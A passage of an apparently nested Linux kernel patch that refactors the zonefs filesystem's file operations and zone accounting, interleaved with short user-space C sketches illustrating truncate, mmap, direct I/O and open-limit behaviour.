++	 * take care of open zones.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		/*
++		 * Truncating a zone to EMPTY or FULL is the equivalent of
++		 * closing the zone. For a truncation to 0, we need to
++		 * re-open the zone to ensure new writes can be processed.
++		 * For a truncation to the maximum file size, the zone is
++		 * closed and writes cannot be accepted anymore, so clear
++		 * the open flag.
++		 */
++		if (!isize)
++			ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
++		else
++			z->z_flags &= ~ZONEFS_ZONE_OPEN;
++	}
++
++	zonefs_update_stats(inode, isize);
++	truncate_setsize(inode, isize);
++	z->z_wpoffset = isize;
++	zonefs_inode_account_active(inode);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++	filemap_invalidate_unlock(inode->i_mapping);
++
++	return ret;
++}
++
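Illustrative aside on the truncation rules above: from user space they surface
through plain truncate(2)/ftruncate(2). A minimal hedged sketch, assuming a
zonefs mount at /mnt/zonefs with a sequential zone file seq/0 (hypothetical
paths); truncating to 0 acts as a zone reset, truncating to the zone capacity
as a zone finish, and any other size is rejected with EPERM:

/* Hedged user-space sketch; the path is an assumption, not from the patch. */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
	const char *path = "/mnt/zonefs/seq/0";	/* hypothetical */

	/* Truncating to 0 is the equivalent of a zone reset. */
	if (truncate(path, 0))
		perror("truncate to 0");

	/*
	 * Any size other than 0 or the zone capacity is rejected by
	 * zonefs_file_truncate() with EPERM.
	 */
	if (truncate(path, 4096))
		perror("truncate to 4096 (EPERM expected)");

	return 0;
}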
++static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
++			     int datasync)
++{
++	struct inode *inode = file_inode(file);
++	int ret = 0;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	/*
++	 * Since only direct writes are allowed in sequential files, page cache
++	 * flush is needed only for conventional zone files.
++	 */
++	if (zonefs_inode_is_cnv(inode))
++		ret = file_write_and_wait_range(file, start, end);
++	if (!ret)
++		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
++
++	if (ret)
++		zonefs_io_error(inode, true);
++
++	return ret;
++}
++
++static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
++{
++	struct inode *inode = file_inode(vmf->vma->vm_file);
++	vm_fault_t ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return VM_FAULT_SIGBUS;
++
++	/*
++	 * Sanity check: only conventional zone files can have shared
++	 * writable mappings.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return VM_FAULT_NOPAGE;
++
++	sb_start_pagefault(inode->i_sb);
++	file_update_time(vmf->vma->vm_file);
++
++	/* Serialize against truncates */
++	filemap_invalidate_lock_shared(inode->i_mapping);
++	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
++	filemap_invalidate_unlock_shared(inode->i_mapping);
++
++	sb_end_pagefault(inode->i_sb);
++	return ret;
++}
++
++static const struct vm_operations_struct zonefs_file_vm_ops = {
++	.fault		= filemap_fault,
++	.map_pages	= filemap_map_pages,
++	.page_mkwrite	= zonefs_filemap_page_mkwrite,
++};
++
++static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	/*
++	 * Conventional zones accept random writes, so their files can support
++	 * shared writable mappings. For sequential zone files, only read
++	 * mappings are possible since there are no guarantees for write
++	 * ordering between msync() and page cache writeback.
++	 */
++	if (zonefs_inode_is_seq(file_inode(file)) &&
++	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
++		return -EINVAL;
++
++	file_accessed(file);
++	vma->vm_ops = &zonefs_file_vm_ops;
++
++	return 0;
++}
++
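Illustrative aside on the mapping restriction above, as a hedged user-space
sketch (paths are assumptions): a shared writable mapping of a sequential zone
file fails with EINVAL, while a private mapping stays possible:

/* Hedged user-space sketch; the path is an assumption, not from the patch. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
	int fd = open("/mnt/zonefs/seq/0", O_RDWR);	/* hypothetical */
	void *p;

	if (fd < 0)
		return 1;

	/* VM_SHARED + VM_MAYWRITE on a sequential file: EINVAL. */
	p = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	if (p == MAP_FAILED)
		perror("MAP_SHARED mmap (EINVAL expected)");

	/* A private (copy-on-write) mapping does not set VM_SHARED. */
	p = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
	if (p != MAP_FAILED)
		munmap(p, 4096);

	close(fd);
	return 0;
}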
++static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
++{
++	loff_t isize = i_size_read(file_inode(file));
++
++	/*
++	 * Seeks are limited to below the zone size for conventional zones
++	 * and below the zone write pointer for sequential zones. In both
++	 * cases, this limit is the inode size.
++	 */
++	return generic_file_llseek_size(file, offset, whence, isize, isize);
++}
++
++static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
++					int error, unsigned int flags)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	if (error) {
++		zonefs_io_error(inode, true);
++		return error;
++	}
++
++	if (size && zonefs_inode_is_seq(inode)) {
++		/*
++		 * Note that we may be seeing completions out of order,
++		 * but that is not a problem since a write completed
++		 * successfully necessarily means that all preceding writes
++		 * were also successful. So we can safely increase the inode
++		 * size to the write end location.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		if (i_size_read(inode) < iocb->ki_pos + size) {
++			zonefs_update_stats(inode, iocb->ki_pos + size);
++			zonefs_i_size_write(inode, iocb->ki_pos + size);
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_write_dio_ops = {
++	.end_io			= zonefs_file_write_dio_end_io,
++};
++
++static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct block_device *bdev = inode->i_sb->s_bdev;
++	unsigned int max = bdev_max_zone_append_sectors(bdev);
++	pgoff_t start, end;
++	struct bio *bio;
++	ssize_t size;
++	int nr_pages;
++	ssize_t ret;
++
++	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
++	iov_iter_truncate(from, max);
++
++	/*
++	 * If the inode block size (zone write granularity) is smaller than the
++	 * page size, we may be appending data belonging to the last page of the
++	 * inode straddling inode->i_size, with that page already cached due to
++	 * a buffered read or readahead. So make sure to invalidate that page.
++	 * This will always be a no-op for the case where the block size is
++	 * equal to the page size.
++	 */
++	start = iocb->ki_pos >> PAGE_SHIFT;
++	end = (iocb->ki_pos + iov_iter_count(from) - 1) >> PAGE_SHIFT;
++	if (invalidate_inode_pages2_range(inode->i_mapping, start, end))
++		return -EBUSY;
++
++	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
++	if (!nr_pages)
++		return 0;
++
++	bio = bio_alloc(bdev, nr_pages,
++			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
++	bio->bi_iter.bi_sector = z->z_sector;
++	bio->bi_ioprio = iocb->ki_ioprio;
++	if (iocb_is_dsync(iocb))
++		bio->bi_opf |= REQ_FUA;
++
++	ret = bio_iov_iter_get_pages(bio, from);
++	if (unlikely(ret))
++		goto out_release;
++
++	size = bio->bi_iter.bi_size;
++	task_io_account_write(size);
++
++	if (iocb->ki_flags & IOCB_HIPRI)
++		bio_set_polled(bio, iocb);
++
++	ret = submit_bio_wait(bio);
++
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at z->z_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			z->z_sector + (z->z_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				bio->bi_iter.bi_sector, z->z_sector);
++			ret = -EIO;
++		}
++	}
++
++	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
++	trace_zonefs_file_dio_append(inode, size, ret);
++
++out_release:
++	bio_release_pages(bio, false);
++	bio_put(bio);
++
++	if (ret >= 0) {
++		iocb->ki_pos += size;
++		return size;
++	}
++
++	return ret;
++}
++
++/*
++ * Do not exceed the LFS limits nor the file zone size. If pos is under the
++ * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
++ */
++static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
++					loff_t count)
++{
++	struct inode *inode = file_inode(file);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t limit = rlimit(RLIMIT_FSIZE);
++	loff_t max_size = z->z_capacity;
++
++	if (limit != RLIM_INFINITY) {
++		if (pos >= limit) {
++			send_sig(SIGXFSZ, current, 0);
++			return -EFBIG;
++		}
++		count = min(count, limit - pos);
++	}
++
++	if (!(file->f_flags & O_LARGEFILE))
++		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
++
++	if (unlikely(pos >= max_size))
++		return -EFBIG;
++
++	return min(count, max_size - pos);
++}
++
++static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t count;
++
++	if (IS_SWAPFILE(inode))
++		return -ETXTBSY;
++
++	if (!iov_iter_count(from))
++		return 0;
++
++	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
++		return -EINVAL;
++
++	if (iocb->ki_flags & IOCB_APPEND) {
++		if (zonefs_zone_is_cnv(z))
++			return -EINVAL;
++		mutex_lock(&zi->i_truncate_mutex);
++		iocb->ki_pos = z->z_wpoffset;
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	count = zonefs_write_check_limits(file, iocb->ki_pos,
++					  iov_iter_count(from));
++	if (count < 0)
++		return count;
++
++	iov_iter_truncate(from, count);
++	return iov_iter_count(from);
++}
++
++/*
++ * Handle direct writes. For sequential zone files, this is the only possible
++ * write path. For these files, check that the user is issuing writes
++ * sequentially from the end of the file. This code assumes that the block layer
++ * delivers write requests to the device in sequential order. This is always the
++ * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
++ * elevator feature is being used (e.g. mq-deadline). The block layer
++ * automatically selects such an elevator for zoned block devices during
++ * device initialization.
++ */
++static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	bool sync = is_sync_kiocb(iocb);
++	bool append = false;
++	ssize_t ret, count;
++
++	/*
++	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
++	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
++	 * on the inode lock but the second goes through and is now unaligned).
++	 */
++	if (zonefs_zone_is_seq(z) && !sync && (iocb->ki_flags & IOCB_NOWAIT))
++		return -EOPNOTSUPP;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	count = zonefs_write_checks(iocb, from);
++	if (count <= 0) {
++		ret = count;
++		goto inode_unlock;
++	}
++
++	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++		ret = -EINVAL;
++		goto inode_unlock;
++	}
++
++	/* Enforce sequential writes (append only) in sequential zones */
++	if (zonefs_zone_is_seq(z)) {
++		mutex_lock(&zi->i_truncate_mutex);
++		if (iocb->ki_pos != z->z_wpoffset) {
++			mutex_unlock(&zi->i_truncate_mutex);
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++		append = sync;
++	}
++
++	if (append) {
++		ret = zonefs_file_dio_append(iocb, from);
++	} else {
++		/*
++		 * iomap_dio_rw() may return ENOTBLK if there was an issue with
++		 * page invalidation. Overwrite that error code with EBUSY to
++		 * be consistent with zonefs_file_dio_append() return value for
++		 * similar issues.
++		 */
++		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
++				   &zonefs_write_dio_ops, 0, NULL, 0);
++		if (ret == -ENOTBLK)
++			ret = -EBUSY;
++	}
++
++	if (zonefs_zone_is_seq(z) &&
++	    (ret > 0 || ret == -EIOCBQUEUED)) {
++		if (ret > 0)
++			count = ret;
++
++		/*
++		 * Update the zone write pointer offset assuming the write
++		 * operation succeeded. If it did not, the error recovery path
++		 * will correct it. Also do active seq file accounting.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++inode_unlock:
++	inode_unlock(inode);
++
++	return ret;
++}
++
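Illustrative aside on the direct write path above, as a hedged user-space
sketch (paths are assumptions): sequential zone files only accept O_DIRECT
writes, block aligned and starting exactly at the write pointer, which zonefs
exposes as the current file size:

/* Hedged user-space sketch; the path is an assumption, not from the patch. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
	int fd = open("/mnt/zonefs/seq/0", O_WRONLY | O_DIRECT);
	struct stat st;
	void *buf;

	if (fd < 0 || fstat(fd, &st))
		return 1;

	/* O_DIRECT requires block-size aligned buffers and offsets. */
	if (posix_memalign(&buf, st.st_blksize, st.st_blksize))
		return 1;
	memset(buf, 0, st.st_blksize);

	/*
	 * The write must start at the zone write pointer, that is, at the
	 * current file size; any other offset fails with EINVAL.
	 */
	if (pwrite(fd, buf, st.st_blksize, st.st_size) < 0)
		perror("sequential write");

	free(buf);
	close(fd);
	return 0;
}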
++static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
++					  struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	ssize_t ret;
++
++	/*
++	 * Direct IO writes are mandatory for sequential zone files so that the
++	 * write IO issuing order is preserved.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return -EIO;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	ret = zonefs_write_checks(iocb, from);
++	if (ret <= 0)
++		goto inode_unlock;
++
++	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
++	if (ret > 0)
++		iocb->ki_pos += ret;
++	else if (ret == -EIO)
++		zonefs_io_error(inode, true);
++
++inode_unlock:
++	inode_unlock(inode);
++	if (ret > 0)
++		ret = generic_write_sync(iocb, ret);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	if (sb_rdonly(inode->i_sb))
++		return -EROFS;
++
++	/* Write operations beyond the zone capacity are not allowed */
++	if (iocb->ki_pos >= z->z_capacity)
++		return -EFBIG;
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		ssize_t ret = zonefs_file_dio_write(iocb, from);
++
++		if (ret != -ENOTBLK)
++			return ret;
++	}
++
++	return zonefs_file_buffered_write(iocb, from);
++}
++
++static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
++				       int error, unsigned int flags)
++{
++	if (error) {
++		zonefs_io_error(file_inode(iocb->ki_filp), false);
++		return error;
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_read_dio_ops = {
++	.end_io			= zonefs_file_read_dio_end_io,
++};
++
++static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++	ssize_t ret;
++
++	/* Offline zones cannot be read */
++	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
++		return -EPERM;
++
++	if (iocb->ki_pos >= z->z_capacity)
++		return 0;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock_shared(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock_shared(inode);
++	}
++
++	/* Limit read operations to written data */
++	mutex_lock(&zi->i_truncate_mutex);
++	isize = i_size_read(inode);
++	if (iocb->ki_pos >= isize) {
++		mutex_unlock(&zi->i_truncate_mutex);
++		ret = 0;
++		goto inode_unlock;
++	}
++	iov_iter_truncate(to, isize - iocb->ki_pos);
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		size_t count = iov_iter_count(to);
++
++		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		file_accessed(iocb->ki_filp);
++		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
++				   &zonefs_read_dio_ops, 0, NULL, 0);
++	} else {
++		ret = generic_file_read_iter(iocb, to);
++		if (ret == -EIO)
++			zonefs_io_error(inode, false);
++	}
++
++inode_unlock:
++	inode_unlock_shared(inode);
++
++	return ret;
++}
++
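Illustrative aside on the read path above, as a hedged user-space sketch
(the path and a 4096-byte block size are assumptions): reads are capped at the
inode size, so reading at or past the write pointer returns 0, and misaligned
direct reads fail with EINVAL:

/* Hedged user-space sketch; path and block size are assumptions. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
	int fd = open("/mnt/zonefs/seq/0", O_RDONLY | O_DIRECT);
	void *buf;
	ssize_t n;

	if (fd < 0)
		return 1;
	if (posix_memalign(&buf, 4096, 4096))
		return 1;

	/* Reads are limited to written data: past i_size, n == 0. */
	n = pread(fd, buf, 4096, 0);
	printf("read %zd bytes\n", n);

	/* Misaligned direct reads are rejected with EINVAL. */
	if (pread(fd, buf, 512, 1) < 0)
		perror("misaligned read (EINVAL expected)");

	free(buf);
	close(fd);
	return 0;
}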
++/*
++ * Write open accounting is done only for sequential files.
++ */
++static inline bool zonefs_seq_file_need_wro(struct inode *inode,
++					    struct file *file)
++{
++	if (zonefs_inode_is_cnv(inode))
++		return false;
++
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	return true;
++}
++
++static int zonefs_seq_file_write_open(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	if (!zi->i_wr_refcnt) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
++		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
++
++		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
++
++			if (sbi->s_max_wro_seq_files
++			    && wro > sbi->s_max_wro_seq_files) {
++				atomic_dec(&sbi->s_wro_seq_files);
++				ret = -EBUSY;
++				goto unlock;
++			}
++
++			if (i_size_read(inode) < z->z_capacity) {
++				ret = zonefs_inode_zone_mgmt(inode,
++							     REQ_OP_ZONE_OPEN);
++				if (ret) {
++					atomic_dec(&sbi->s_wro_seq_files);
++					goto unlock;
++				}
++				z->z_flags |= ZONEFS_ZONE_OPEN;
++				zonefs_inode_account_active(inode);
++			}
++		}
++	}
++
++	zi->i_wr_refcnt++;
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	return ret;
++}
++
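Illustrative aside on the write open accounting above, as a hedged user-space
sketch (mount point and file layout are assumptions): with the explicit-open
mount option, the first write open of a sequential file issues
REQ_OP_ZONE_OPEN, and opens beyond s_max_wro_seq_files fail with EBUSY:

/* Hedged user-space sketch; paths are assumptions, not from the patch. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>

int main(void)
{
	char path[64];
	int i, fd;

	for (i = 0; i < 1024; i++) {
		snprintf(path, sizeof(path), "/mnt/zonefs/seq/%d", i);
		fd = open(path, O_WRONLY | O_DIRECT);
		if (fd < 0) {
			/* EBUSY once the open zone limit is reached. */
			perror(path);
			break;
		}
		/* File descriptors are kept open so the zones stay open. */
	}
	return 0;
}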
++static int zonefs_file_open(struct inode *inode, struct file *file)
++{
++	int ret;
++
++	ret = generic_file_open(inode, file);
++	if (ret)
++		return ret;
++
++	if (zonefs_seq_file_need_wro(inode, file))
++		return zonefs_seq_file_write_open(inode);
++
++	return 0;
++}
++
++static void zonefs_seq_file_write_close(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	zi->i_wr_refcnt--;
++	if (zi->i_wr_refcnt)
++		goto unlock;
++
++	/*
++	 * The file zone may not be open anymore (e.g. the file was truncated to
++	 * its maximum size or it was fully written). For this case, we only
++	 * need to decrement the write open count.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
++		if (ret) {
++			__zonefs_io_error(inode, false);
++			/*
++			 * Leaving zones explicitly open may lead to a state
++			 * where most zones cannot be written (zone resources
++			 * exhausted). So take preventive action by remounting
++			 * read-only.
++			 */
++			if (z->z_flags & ZONEFS_ZONE_OPEN &&
++			    !(sb->s_flags & SB_RDONLY)) {
++				zonefs_warn(sb,
++					"closing zone at %llu failed %d\n",
++					z->z_sector, ret);
++				zonefs_warn(sb,
++					"remounting filesystem read-only\n");
++				sb->s_flags |= SB_RDONLY;
++			}
++			goto unlock;
++		}
++
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
++		zonefs_inode_account_active(inode);
++	}
++
++	atomic_dec(&sbi->s_wro_seq_files);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++static int zonefs_file_release(struct inode *inode, struct file *file)
++{
++	/*
++	 * If we explicitly open a zone we must close it again as well, but the
++	 * zone management operation can fail (either due to an IO error or
++	 * because the zone has gone offline or read-only). Make sure we don't
++	 * fail the close(2) for user-space.
++	 */
++	if (zonefs_seq_file_need_wro(inode, file))
++		zonefs_seq_file_write_close(inode);
++
++	return 0;
++}
++
++const struct file_operations zonefs_file_operations = {
++	.open		= zonefs_file_open,
++	.release	= zonefs_file_release,
++	.fsync		= zonefs_file_fsync,
++	.mmap		= zonefs_file_mmap,
++	.llseek		= zonefs_file_llseek,
++	.read_iter	= zonefs_file_read_iter,
++	.write_iter	= zonefs_file_write_iter,
++	.splice_read	= generic_file_splice_read,
++	.splice_write	= iter_file_splice_write,
++	.iopoll		= iocb_bio_iopoll,
++};
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index a9c5c3f720adf..270ded209dde5 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -28,33 +28,47 @@
+ #include "trace.h"
+ 
+ /*
+- * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ * Get the name of a zone group directory.
+  */
+-static void zonefs_account_active(struct inode *inode)
++static const char *zonefs_zgroup_name(enum zonefs_ztype ztype)
+ {
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	switch (ztype) {
++	case ZONEFS_ZTYPE_CNV:
++		return "cnv";
++	case ZONEFS_ZTYPE_SEQ:
++		return "seq";
++	default:
++		WARN_ON_ONCE(1);
++		return "???";
++	}
++}
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++/*
++ * Manage the active zone count.
++ */
++static void zonefs_account_active(struct super_block *sb,
++				  struct zonefs_zone *z)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
++	if (zonefs_zone_is_cnv(z))
+ 		return;
+ 
+ 	/*
+ 	 * For zones that transitioned to the offline or readonly condition,
+ 	 * we only need to clear the active state.
+ 	 */
+-	if (zi->i_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
++	if (z->z_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
+ 		goto out;
+ 
+ 	/*
+ 	 * If the zone is active, that is, if it is explicitly open or
+ 	 * partially written, check if it was already accounted as active.
+ 	 */
+-	if ((zi->i_flags & ZONEFS_ZONE_OPEN) ||
+-	    (zi->i_wpoffset > 0 && zi->i_wpoffset < zi->i_max_size)) {
+-		if (!(zi->i_flags & ZONEFS_ZONE_ACTIVE)) {
+-			zi->i_flags |= ZONEFS_ZONE_ACTIVE;
++	if ((z->z_flags & ZONEFS_ZONE_OPEN) ||
++	    (z->z_wpoffset > 0 && z->z_wpoffset < z->z_capacity)) {
++		if (!(z->z_flags & ZONEFS_ZONE_ACTIVE)) {
++			z->z_flags |= ZONEFS_ZONE_ACTIVE;
+ 			atomic_inc(&sbi->s_active_seq_files);
+ 		}
+ 		return;
+@@ -62,18 +76,29 @@ static void zonefs_account_active(struct inode *inode)
+ 
+ out:
+ 	/* The zone is not active. If it was, update the active count */
+-	if (zi->i_flags & ZONEFS_ZONE_ACTIVE) {
+-		zi->i_flags &= ~ZONEFS_ZONE_ACTIVE;
++	if (z->z_flags & ZONEFS_ZONE_ACTIVE) {
++		z->z_flags &= ~ZONEFS_ZONE_ACTIVE;
+ 		atomic_dec(&sbi->s_active_seq_files);
+ 	}
+ }
+ 
+-static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
++/*
++ * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ */
++void zonefs_inode_account_active(struct inode *inode)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret;
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++	return zonefs_account_active(inode->i_sb, zonefs_inode_zone(inode));
++}
++
++/*
++ * Execute a zone management operation.
++ */
++static int zonefs_zone_mgmt(struct super_block *sb,
++			    struct zonefs_zone *z, enum req_op op)
++{
++	int ret;
+ 
+ 	/*
+ 	 * With ZNS drives, closing an explicitly open zone that has not been
+@@ -83,201 +108,49 @@ static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
+ 	 * are exceeded, make sure that the zone does not remain active by
+ 	 * resetting it.
+ 	 */
+-	if (op == REQ_OP_ZONE_CLOSE && !zi->i_wpoffset)
++	if (op == REQ_OP_ZONE_CLOSE && !z->z_wpoffset)
+ 		op = REQ_OP_ZONE_RESET;
+ 
+-	trace_zonefs_zone_mgmt(inode, op);
+-	ret = blkdev_zone_mgmt(inode->i_sb->s_bdev, op, zi->i_zsector,
+-			       zi->i_zone_size >> SECTOR_SHIFT, GFP_NOFS);
++	trace_zonefs_zone_mgmt(sb, z, op);
++	ret = blkdev_zone_mgmt(sb->s_bdev, op, z->z_sector,
++			       z->z_size >> SECTOR_SHIFT, GFP_NOFS);
+ 	if (ret) {
+-		zonefs_err(inode->i_sb,
++		zonefs_err(sb,
+ 			   "Zone management operation %s at %llu failed %d\n",
+-			   blk_op_str(op), zi->i_zsector, ret);
++			   blk_op_str(op), z->z_sector, ret);
+ 		return ret;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-static inline void zonefs_i_size_write(struct inode *inode, loff_t isize)
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	i_size_write(inode, isize);
+-	/*
+-	 * A full zone is no longer open/active and does not need
+-	 * explicit closing.
+-	 */
+-	if (isize >= zi->i_max_size) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-
+-		if (zi->i_flags & ZONEFS_ZONE_ACTIVE)
+-			atomic_dec(&sbi->s_active_seq_files);
+-		zi->i_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+-	}
++	return zonefs_zone_mgmt(inode->i_sb, zonefs_inode_zone(inode), op);
+ }
+ 
+-static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
+-				   loff_t length, unsigned int flags,
+-				   struct iomap *iomap, struct iomap *srcmap)
++void zonefs_i_size_write(struct inode *inode, loff_t isize)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 
+-	/*
+-	 * All blocks are always mapped below EOF. If reading past EOF,
+-	 * act as if there is a hole up to the file maximum size.
+-	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
